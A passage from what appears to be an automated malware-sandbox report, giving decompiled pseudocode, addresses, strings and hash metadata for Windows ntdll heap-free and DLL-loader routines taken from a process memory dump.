									if(__eflags != 0) {
										E34F0EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E34F0D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E34F15FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E34E6096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E34F15FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E34E63C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E34F0F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E34E63C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E34F0F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E34E6036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E34F15FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E34F15FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x34f4432c; // 0x0
						_v24 = 0x34f4432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x34e60689
0x34e6068d
0x34e60690
0x34e60699
0x34e606a3
0x34e60929
0x00000000
0x34e60929
0x34e606b0
0x34eb4e97
0x34eb4e99
0x34eb4e9f
0x34eb4ea5
0x34eb4ea9
0x34eb4eca
0x34eb4ecf
0x34eb4eab
0x34eb4ec0
0x34eb4ec5
0x34eb4ed7
0x34eb4edc
0x34eb4ee4
0x34eb4eeb
0x34eb4ef6
0x34eb4ef6
0x34eb4eeb
0x34eb4e99
0x34e606b6
0x34e606b9
0x34e606b9
0x34e606be
0x34e60921
0x34e606c4
0x34e606c4
0x34e606c4
0x34e606ca
0x34e606d3
0x34e606d9
0x34e606dc
0x34eb4f0a
0x34eb4f10
0x34eb4f13
0x00000000
0x34e606e2
0x34e606e2
0x34e606f2
0x34e60930
0x34e60936
0x34e60938
0x34e6093e
0x34e6093e
0x34e60938
0x34e606ff
0x34eb4f1b
0x34eb4f1d
0x34eb4f22
0x34eb4f29
0x34eb4f2a
0x34eb4f2c
0x34eb4f2d
0x34eb4f2f
0x34eb4f34
0x34eb4f36
0x34eb4f39
0x34eb4f44
0x34eb4f4d
0x34eb4f4f
0x34eb4f54
0x34eb4f5b
0x34eb4f5b
0x00000000
0x34eb4f5b
0x34eb4f3b
0x34eb4f3d
0x00000000
0x00000000
0x34eb4f3f
0x34eb4f42
0x00000000
0x00000000
0x00000000
0x34e60705
0x34e60705
0x34e6070c
0x34e6070e
0x34e60724
0x34e60727
0x34e6072d
0x34e60730
0x34e60751
0x34e60751
0x34e60757
0x34e6075c
0x34e6075d
0x34e6075f
0x34e60760
0x34e60762
0x34e60767
0x34e6076a
0x34e6076a
0x34e60770
0x34e60772
0x34eb4f9f
0x00000000
0x34eb4f9f
0x34e6077e
0x34e60783
0x34eb4faa
0x34eb4fad
0x00000000
0x00000000
0x34eb4fbc
0x34e6078e
0x34e60791
0x34eb4fcc
0x34eb4fd3
0x34eb4fe2
0x34eb4fe2
0x34eb4fd3
0x34e6079b
0x34e607a0
0x34e607a4
0x34e607b0
0x34e607b7
0x34eb4fec
0x34eb4ff1
0x34eb4ff1
0x34e607b7
0x34e607bd
0x34e607c1
0x34e607c5
0x34e607c8
0x34e607cb
0x34e607d0
0x34e607d3
0x34e607d3
0x34e607d6
0x34eb5008
0x34e607e4
0x34e607e4
0x34e607e6
0x34e607e6
0x34e607e9
0x34e607ee
0x34e6081b
0x34e6081b
0x34e6081e
0x34e60827
0x34e6082d
0x34e60833
0x34e60839
0x34e6083f
0x34e60848
0x34e608fd
0x34e60903
0x34e60903
0x34e6084e
0x34e60851
0x34e60855
0x34e60945
0x34e6094d
0x34e60950
0x34e60953
0x34e60964
0x00000000
0x34e60964
0x34e60955
0x00000000
0x34e6085b
0x34e6085b
0x34e6086e
0x34e60876
0x34e60879
0x34e60879
0x34e6087c
0x34e60880
0x34e60885
0x34e608dd
0x34e608de
0x34e608e1
0x34e608e6
0x34e608f3
0x34e608f8
0x34e608f8
0x34e60887
0x34e60887
0x34e60887
0x34e60889
0x34e60892
0x34e60897
0x34eb505d
0x34eb5060
0x00000000
0x00000000
0x34eb506f
0x34e608a2
0x34e608a5
0x34eb5079
0x34eb507f
0x34eb5086
0x00000000
0x00000000
0x34eb5091
0x34eb5093
0x34eb50a5
0x34eb5095
0x34eb509e
0x34eb509e
0x34eb50af
0x34eb50be
0x34e608ae
0x34e608b4
0x34e608b9
0x34eb50c8
0x34eb50cb
0x00000000
0x00000000
0x34eb50da
0x34e608c4
0x34e608c7
0x34eb50e9
0x34eb50eb
0x34eb50fd
0x34eb50ed
0x34eb50f6
0x34eb50f6
0x34eb5113
0x34eb5113
0x00000000
0x34e608cd
0x34e608bf
0x34e608bf
0x00000000
0x34e608bf
0x34e608ab
0x34e608ab
0x00000000
0x34e608ab
0x34e6089d
0x34e6089d
0x00000000
0x34e6089d
0x34e607f0
0x34e607f0
0x34e607f8
0x34eb5014
0x34eb5017
0x34eb501a
0x34eb5036
0x34eb503d
0x00000000
0x00000000
0x00000000
0x00000000
0x34eb501c
0x34eb501c
0x34eb501c
0x34eb501e
0x34eb5020
0x34eb5023
0x34eb5026
0x00000000
0x00000000
0x34eb5028
0x34eb502b
0x34eb502e
0x00000000
0x00000000
0x00000000
0x34eb5030
0x34eb5035
0x34eb5035
0x00000000
0x34eb5035
0x34e607fe
0x34e607fe
0x34e60801
0x34e60803
0x34e60808
0x34eb5053
0x34e60816
0x34e60816
0x34e60818
0x34e60818
0x00000000
0x34e60808
0x34e607ee
0x34e60789
0x34e60789
0x00000000
0x34e60789
0x34e60732
0x34e60736
0x34eb4f63
0x34eb4f66
0x34eb4f66
0x34eb4f6b
0x34eb4f6d
0x00000000
0x00000000
0x34eb4f76
0x34eb4f79
0x34eb4f7b
0x34eb4f8d
0x34eb4f92
0x34eb4f92
0x34eb4f95
0x00000000
0x34eb4f95
0x34e6073c
0x34e60742
0x34e6074b
0x00000000
0x00000000
0x00000000
0x34e6074b
0x34e606ff

Strings

(UCRBlock->Size >= *Size), xrefs: 34EB4ED7
HEAP: , xrefs: 34EB4ECA
HEAP[%wZ]: , xrefs: 34EB4EBB

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 6c93187d4502ac555ae04fde99101485499efebb74c00ea3aa67bdb2a3b38963
Instruction ID: f5e419584cb83335c4a6d96859039f95f9b9dac7d157d350b5f97b9f74a16925
Opcode Fuzzy Hash: 6c93187d4502ac555ae04fde99101485499efebb74c00ea3aa67bdb2a3b38963
Instruction Fuzzy Hash: FCF1B975B44615DFEB05CF68C880B6AB7B5FF84348F1485A8E4569B381DB38E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34E79723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34E79723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E34E7A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x34f465f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x34f49214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E34E5FED0(0x34f432d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x77f436a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E34E70C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x34f491e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E34E598DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E34ED85AA(_t87);
							}
						}
						__eflags =  *0x34f437c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E34ECE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E34E7A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x34f432d8);
					_t50 = E34E5E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L34E62330(_t50, 0x34f46668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E34E6D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E34E624D0(0x34f46668);
								__eflags = _v12;
								if(_v12 != 0) {
									E34E79723(_t86, 0);
								}
								_t50 = L34E63BC0( *0x34f45d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E34E79938(L34E62330(_t50, 0x34f46668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L34E79B40(_t85, _t107, _t110, 0x34f467ac);
							_t29 = _t107 + 0x68; // -68
							L34E79B40(_t85, _t107, _t110, 0x34f467a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E34E624D0(0x34f46668);
						if( *0x34f45d70 != 0) {
							E34E8680F(_t107);
						}
						_t50 = E34E6D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x34e79723
0x34e7972b
0x34e79736
0x34e79738
0x34e7973c
0x34e7973e
0x34e79742
0x34e79747
0x34e797bc
0x34e797bc
0x34e797bc
0x34e797bc
0x34e797c0
0x34e797c5
0x34e797c5
0x34e797cb
0x34e79900
0x34e79908
0x34e79913
0x34e79914
0x34e79916
0x34e79918
0x34e79918
0x34e797d6
0x34e797db
0x34e797dd
0x34e797dd
0x34e797e1
0x34e797e3
0x00000000
0x00000000
0x34e797e5
0x34e797e5
0x34e797e8
0x34e797ec
0x34e797ee
0x34e797f1
0x34e797f4
0x34e797f9
0x34e797fb
0x34e79922
0x34e79928
0x34e79928
0x34e79803
0x34e79805
0x34e7980a
0x34e7980e
0x34e79815
0x34ebdade
0x34ebdae0
0x34ebdae0
0x34e79815
0x34e7981b
0x34e79822
0x34ebdaea
0x34ebdb04
0x34ebdb09
0x34ebdb09
0x34e79828
0x34e7982a
0x34e7982d
0x34e79836
0x34e79836
0x34e7983a
0x34e7983f
0x34e79755
0x34e79755
0x34e79755
0x34e7975a
0x00000000
0x00000000
0x34e7986e
0x34e79870
0x34e79872
0x34e7992f
0x34e79931
0x34e79878
0x34e79878
0x34e79878
0x34e79878
0x34e79878
0x34e7987c
0x34e7987e
0x00000000
0x34e79884
0x34e79889
0x34e7988e
0x34e79891
0x34e79891
0x34e79894
0x34e79897
0x34e79899
0x34e7989d
0x34e7989f
0x34e798b1
0x34e798b3
0x34e798b5
0x34e798b8
0x34e798c0
0x34e798c2
0x34e798c2
0x34e798c4
0x34e798c4
0x34e798cd
0x34e798d0
0x34e798da
0x34e798df
0x34e798e4
0x34e798e8
0x34e798e8
0x34e798f6
0x00000000
0x34e798f6
0x34e798a1
0x34e798a3
0x34e798a3
0x34e798a5
0x34e798a7
0x34e798a9
0x34e798a9
0x34e798ad
0x00000000
0x34e798ad
0x34e7987e
0x34e79760
0x34e79762
0x34e7976b
0x34e797b5
0x34e797bb
0x00000000
0x00000000
0x00000000
0x34e7976d
0x34e7976d
0x34e7976d
0x34e7976f
0x34e79777
0x34e79782
0x34e7978b
0x34e79849
0x34e79852
0x34e79857
0x34e79860
0x34e79865
0x34e79865
0x34e79796
0x34e797a2
0x34ebdb13
0x34ebdb13
0x34e797aa
0x34e797af
0x34e797b1
0x00000000
0x34e7976d
0x34e7974d
0x00000000
0x00000000
0x34e79753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E79922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 34EBDAFF
Unmapping DLL "%wZ", xrefs: 34EBDAEE
LdrpUnloadNode, xrefs: 34EBDAF5

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 9d7391f81ca0bc188c73dff2866b531e6ca94ce290d4b7e0bcfb2f4d72934cb0
Instruction ID: 361a786765e0f7bca27f0815e069c17c10de7d35dee1f920649649178bde9116
Opcode Fuzzy Hash: 9d7391f81ca0bc188c73dff2866b531e6ca94ce290d4b7e0bcfb2f4d72934cb0
Instruction Fuzzy Hash: 1551FF71714301DFF714DF38C880B297BA5BF84328F180A6DE4569B6A1EB38A805CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34E8C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E34E8C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E34E70130();
				if(_t25 != 0) {
					L34E62330(_t25, 0x34f45b5c);
					_t27 =  *0x34f49224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E34E49050( *0x34f4921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E34E624D0(0x34f45b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x34f4b370 ^ _t87;
							_t76 = _t65;
							 *0x34f491e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x34f4660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									L34EDCB20(0x34f45b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x34f46608 & 0x0000ffff) + 2 + _t67;
									_t42 = E34E65D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E34E710D0(_t67,  &_v572, 0x34f46608);
										E34E710D0(_t67,  &_v580,  &_v572);
										E34E5FE40(_t67,  &_v588, ";");
										L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x34f4660c);
										 *0x34f46608 = _v608;
										_t54 = _v604;
										 *0x34f4660c = _t54;
										 *0x34f46604 = _t54;
										E34EDD4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x34f437c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E34ECE692();
											_t56 =  *0x34f437c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return L34E94B50(_t39, 0x34f45b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x34f49224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E34E49050( *0x34f4921c, 1);
								}
							}
							_t25 = E34E624D0(0x34f45b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x34e8c640
0x34e8c642
0x34e8c644
0x34e8c645
0x34e8c647
0x34e8c64e
0x34e8c65a
0x34e8c65f
0x34e8c664
0x34e8c666
0x34e8c668
0x34e8c6a4
0x34e8c6a6
0x00000000
0x34e8c6a8
0x34e8c6a8
0x00000000
0x34e8c6a8
0x34e8c66a
0x34e8c66a
0x34e8c66c
0x34e8c675
0x34e8c675
0x34e8c67a
0x34e8c67d
0x34e8c6ab
0x34e8c6ac
0x34e8c6b3
0x34e8c6b4
0x34e8c6be
0x34e8c6cb
0x34e8c6dc
0x34e8c6df
0x34e8c6e9
0x34e8c6e9
0x34e8c6eb
0x34ec8090
0x34ec809b
0x34ec80a4
0x34ec80a9
0x34ec80ae
0x34ec817f
0x34ec8183
0x34ec8188
0x34ec8189
0x00000000
0x34ec80b4
0x34ec80c4
0x34ec80cc
0x34ec80d1
0x34ec80d5
0x34ec80d7
0x34ec8114
0x34ec8116
0x34ec811b
0x34ec812a
0x34ec8139
0x34ec8148
0x34ec815e
0x34ec8167
0x34ec816c
0x34ec8170
0x34ec8175
0x34ec817a
0x00000000
0x34ec80d9
0x34ec80d9
0x34ec80de
0x34ec80e0
0x34ec80e2
0x34ec80e7
0x34ec80e9
0x34ec80ee
0x34ec80f3
0x34ec80f8
0x34ec80fd
0x34ec8102
0x34ec8102
0x34ec8105
0x34ec8107
0x34ec8109
0x34ec8109
0x34ec810a
0x34ec810a
0x34ec80d7
0x34e8c6f1
0x34e8c6f1
0x34e8c6f1
0x34e8c6f1
0x34e8c6f1
0x34e8c6fa
0x34e8c6fb
0x34e8c705
0x34e8c67f
0x34e8c67f
0x34e8c67f
0x34e8c680
0x34e8c680
0x34e8c685
0x34e8c687
0x34e8c689
0x34e8c68b
0x34e8c68d
0x34e8c697
0x34e8c697
0x34e8c68d
0x34e8c69d
0x00000000
0x34e8c69d
0x34e8c67d
0x34e8c650
0x34e8c650
0x34e8c653
0x34e8c653

APIs

RtlDebugPrintTimes.NTDLL ref: 34E8C6DF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EC80F3
Failed to reallocate the system dirs string !, xrefs: 34EC80E2
LdrpInitializePerUserWindowsDirectory, xrefs: 34EC80E9

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 2c419d00eded10f0ca4351e52df9a070188bfd6ed86927516d93c097453c686a
Instruction ID: 94fc318832f5d250a56dab03fdca69bd8361a5671ddac6e1bdf9ad05eb651786
Opcode Fuzzy Hash: 2c419d00eded10f0ca4351e52df9a070188bfd6ed86927516d93c097453c686a
Instruction Fuzzy Hash: 6941EEB5664310EFEB11DB64E904B4B77E8EF45A54F04592AF888A7250EB38D801CB96

Uniqueness

Uniqueness Score: -1.00%

Function 34F2ACEB Relevance: 6.4, APIs: 4, Instructions: 450
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E34F2ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
